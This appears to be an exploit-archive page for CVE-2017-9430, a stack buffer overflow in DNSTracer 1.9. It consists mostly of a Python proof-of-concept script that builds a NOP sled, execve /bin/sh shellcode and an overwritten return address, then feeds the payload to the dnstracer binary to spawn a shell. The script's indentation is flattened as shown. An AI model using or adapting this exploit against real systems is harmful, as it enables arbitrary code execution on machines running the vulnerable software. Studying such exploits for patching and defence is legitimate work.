DNSTracer 1.9 Buffer Overflow

DNSTracer version 1.9 suffers from a buffer overflow vulnerability.


MD5 | 2e16347220a1cfdb358f075642a51b5a

# Exploit Title: DNSTracer 1.9 - Buffer Overflow
# Google Dork: [if applicable]
# Date: 03-08-2017
# Exploit Author: j0lama
# Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php
# Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz
# Version: 1.9
# Tested on: Ubuntu 12.04
# CVE : CVE-2017-9430
# Bug report: https://www.exploit-db.com/exploits/42115/
# Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php


# Proof of Concept
import os
from subprocess import call

def run():
try:
print "\nDNSTracer Stack-based Buffer Overflow"
print "Author: j0lama"
print "Tested with Dnstracer compile without buffer overflow protection"

nops = "\x90"*1006
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
filling = "A"*24
eip = "\x2f\xeb\xff\xbf"

#buf size = 1057
buf = nops + shellcode + filling + eip

call(["./dnstracer", buf])

except OSError as e:
if e.errno == os.errno.ENOENT:
print "\nDnstracer not found!\n"
else:
print "\nError executing exploit\n"
raise


if __name__ == '__main__':
try:
run()
except Exception as e:
print "Something went wrong"


Related Posts